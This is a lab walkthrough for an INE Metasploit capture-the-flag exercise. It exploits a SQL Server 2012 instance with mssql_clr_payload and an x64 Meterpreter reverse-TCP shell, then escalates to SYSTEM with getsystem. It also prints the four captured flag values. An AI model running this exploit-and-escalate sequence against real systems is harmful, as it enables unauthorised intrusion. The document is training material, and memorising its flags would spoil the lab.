INE - The Metasploit Framework CTF

The target machine will be accessible at target.ine.local.

Objective: Use Metasploit and manual investigation techniques to capture the following flags:

• Flag 1: Gain access to the MSSQLSERVER account on the target machine to retrieve the first flag.

• Flag 2: Locate the second flag within the Windows configuration folder.

• Flag 3: The third flag is also hidden within the system directory. Find it to uncover a hint for accessing the final flag.

• Flag 4: Investigate the Administrator directory to find the fourth flag.

Tools

The best tools for this lab are:

• Nmap

• Metasploit Framework

• mssql

FLAG 1 > Solution

Task > Gain access to the MSSQLSERVER account on the target machine to retrieve the first flag

Target > target.ine.local

In a terminal run resolveip > target.ine.local > 10.3.29.191

run service postgresql start && msfconsole -q > start database to save scans and MSF console

workspace -a msf_ctf > create a new msf_ctf workspace

Google search for sql server port # > SQL Server uses various ports for different components and services. The default port for the SQL Server Database Engine is TCP port 1433.

db_nmap -sS -sV -O 10.3.29.191 > run nmap scan of target within MSF console

run services > 10.3.29.191 1433 tcp ms-sql-s open Microsoft SQL Server 2012 11.00.6020; SP3

search MSSQL 2012 > use exploit/windows/mssql/mssql_clr_payload

set rhosts 10.3.29.191

run

Result: [!] 10.3.29.191:1433 - Setting EXITFUNC to 'thread' so we don't kill SQL Server [-] 10.3.29.191:1433 - Exploit aborted due to failure: bad-config: Target SQL server arch is x64, payload architecture is x86 [*] Exploit completed, but no session was created.

From the error message above the exploit failed because we are using an x86 payload. In order for the exploit to work we need to use an x64 meterpreter payload

set payload windows/x64/meterpreter/reverse_tcp

run

result > meterpreter > Server username: NT Service\MSSQLSERVER

run getuid >

run shell > to get a shell terminal

cd c:\ > run dir > flag1.txt

run type flag1.txt >

Flag 1 > 669e674ef13c43da96d2d65df0564c71

Flag 2: Locate the second flag within the Windows configuration folder.

A qucik google search of where is windows config folder path.

C: WINDOWSsystem32config

cd windows/system32

c:\Windows\System32>cd config > Access is denied meaning we don't have required privilege to access this folder path.

Tried various windows privilege escalation techniques such as migrate to a higher privileged process with a higher privilege, using incognito to impersonate a high-privilege token token impersonation but none of the technique was working on the server.

After further online research stumbled upon Automatic privilege escalation process using get system command. This is a built-in module in meterpeter that attempts to elevate the current users' privileges to the highest level possible, typically NT AUTHORITY\SYSTEM on windows systems.

How getsystem Works** The getsystem command uses several techniques to escalate privileges. These techniques are tried in sequence until one succeeds or all fail. The techniques include:

1. Named Pipe Impersonation (In Memory/Admin):

• Creates a named pipe and attempts to impersonate a higher-privileged token.

• Works if the current user has administrative privileges.

1. Named Pipe Impersonation (Dropper/Admin):

• Similar to the first technique but writes a DLL to disk temporarily.

• Used if the in-memory technique fails.

1. Token Duplication (In Memory/Admin):

• Duplicates the token of a higher-privileged process.

• Requires the ability to interact with other processes.

1. Service Permissions Exploit:

• Attempts to exploit misconfigured service permissions to escalate privileges.

Using getsystem

1. Check Current Privileges: Before running getsystem, check your current privileges:

getuid

• If the output is NT AUTHORITY\SYSTEM, you already have the highest privileges.

1. Run getsystem: To attempt privilege escalation:

getsystem

1. Verify Privileges: After running getsystem, check if the privileges were escalated:

2. getuid

• If successful, the output should now be NT AUTHORITY\SYSTEM.

Therefore to continue,

run getsystem > got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).

then run getuid > server username: NT Authority\System

run shell

cd config > dir

type flag2.txt

Flag 2 > c9c890f24d934dcd896232d58f88915e

Flag 3: The third flag is also hidden within the system directory. Find it to uncover a hint for accessing the final flag

Here we are not given a specific directory, only a hint that the flag is located within the c:\Windows\System32 directory

There we can try to use the find command to find txt files. Howerver since we dealing with a windows machine, we can use the dir command

Therefore, in the c:\Windows\System32 shell run dir /s /b C:\Windows\System32*.txt Where, /s: Searches subdirectories. | /b: Displays filenames only (no metadata). | *.txt: Filters for .txt files.

dir /s /b C:\Windows\System32*.txt >

We can see the following from the result > Directory of C:\Windows\system32\drivers\etc

EscaltePrivilageToGetThisFlag.txt 1 File(s)

Therefore, we can navigate to C:\Windows\system32\drivers\etc

run cd C:\Windows\system32\drivers\etc > 34 EscaltePrivilageToGetThisFlag.txt

run type EscaltePrivilageToGetThisFlag.txt

Flag 3> e41c038cd30f464082aa553b2492dc5b

Flag 4: Investigate the Administrator directory to find the fourth flag.

The default home directory for the built-in Administrator account is usually C:\Users\Administrator

In the shell terminal, run C:>cd \users\administrator\

then run dir

cd desktop

dir > 34 flag4.txt

type flag4.txt

Flag 4 > 7144ff5b34ca4aa89a72a5c2316c3a78